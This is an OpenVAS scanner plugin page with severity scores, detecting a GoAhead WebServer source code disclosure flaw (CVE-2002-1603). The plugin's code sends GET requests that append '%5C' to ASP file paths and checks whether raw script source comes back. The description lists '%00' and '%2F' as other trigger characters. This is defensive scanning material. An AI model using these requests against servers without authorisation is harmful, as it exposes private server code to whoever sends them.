Lucene search

K
openvasCopyright (C) 2008 Ferdy RiphagenOPENVAS:13614125623102000099
HistoryAug 22, 2008 - 12:00 a.m.

GoAhead WebServer Script Source Code Disclosure

2008-08-2200:00:00
Copyright (C) 2008 Ferdy Riphagen
plugins.openvas.org
22

6.5 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

Access Complexity

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.055 Low

EPSS

Percentile

93.3%

A vulnerable version of GoAhead Webserver is running on the
remote host.

Description :

GoAhead Webserver is installed on the remote system.
It

# SPDX-FileCopyrightText: 2008 Ferdy Riphagen
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.2000099");
  script_version("2023-08-01T13:29:10+0000");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2008-08-22 16:09:14 +0200 (Fri, 22 Aug 2008)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_cve_id("CVE-2002-1603");
  script_xref(name:"OSVDB", value:"13295");
  script_name("GoAhead WebServer Script Source Code Disclosure");
  script_category(ACT_GATHER_INFO);
  script_family("Web Servers");
  script_copyright("Copyright (C) 2008 Ferdy Riphagen");
  script_dependencies("gb_goahead_detect.nasl");
  script_mandatory_keys("embedthis/goahead/detected");

  script_xref(name:"URL", value:"http://aluigi.altervista.org/adv/goahead-adv3.txt");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/9239");
  script_xref(name:"URL", value:"http://www.kb.cert.org/vuls/id/975041");

  script_tag(name:"solution", value:"Upgrade to GoAhead WebServer 2.1.8 or a newer release.");

  script_tag(name:"summary", value:"A vulnerable version of GoAhead Webserver is running on the
  remote host.

  Description :

  GoAhead Webserver is installed on the remote system.
  It's an open-source webserver, which is capable of
  hosting ASP pages, and installation on multiple operating
  systems.

  The version installed is vulnerable to Script Source Code
  Disclosure, by adding extra characters to the URL. Possible
  characters are %00, %5C, %2F.");

  script_tag(name:"qod_type", value:"remote_banner_unreliable");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

CPE = "cpe:/a:embedthis:goahead";

include("host_details.inc");
include("http_func.inc");

function GetFileExt(file) {
 ret = split(file, sep: '.');
 return ret;
}

if(!port = get_app_port(cpe:CPE)) exit(0);
get_app_location(cpe:CPE, port:port);

banner = http_get_remote_headers(port:port);

host = http_host_name(port:port);

# Possible default file which still could be available.
file[0] = "/treeapp.asp";

# Below options could possible create false-positives.
file[1] = "/default.asp";

if ("HTTP/1.0 302" && "Location:" >< banner) {
  redirect = egrep(pattern:"^Location:", string:banner);
  rfile = ereg_replace(pattern:"Location: http:\/\/+[^/]+", string:redirect, replace:"", icase:TRUE);

  # See if the file is really asp.
  ret = GetFileExt(file:rfile);
  if(!isnull(ret)) {
    if (ereg(pattern:"asp", string:ret[1], icase:1)) {
      file[2] = chomp(rfile);
    }
  }
}

for (n = 0; file[n]; n++) {

  url = file[n] + "%5C";
  req = string("GET ", url, " HTTP/1.1", "\r\n",
               "Host: ", host, "\r\n\r\n");
  res = http_send_recv(port:port, data:req); # Server doesn't support keepalives.

  if ('<% write(HTTP_AUTHORIZATION); %>' >< res ||
     ('<%' >< res && ('%>' >< res))) {
    report = http_report_vuln_url(port:port, url:url);
    security_message(port:port, data:report);
    exit(0);
  }
}

exit(99);

6.5 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

Access Complexity

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.055 Low

EPSS

Percentile

93.3%

Related for OPENVAS:13614125623102000099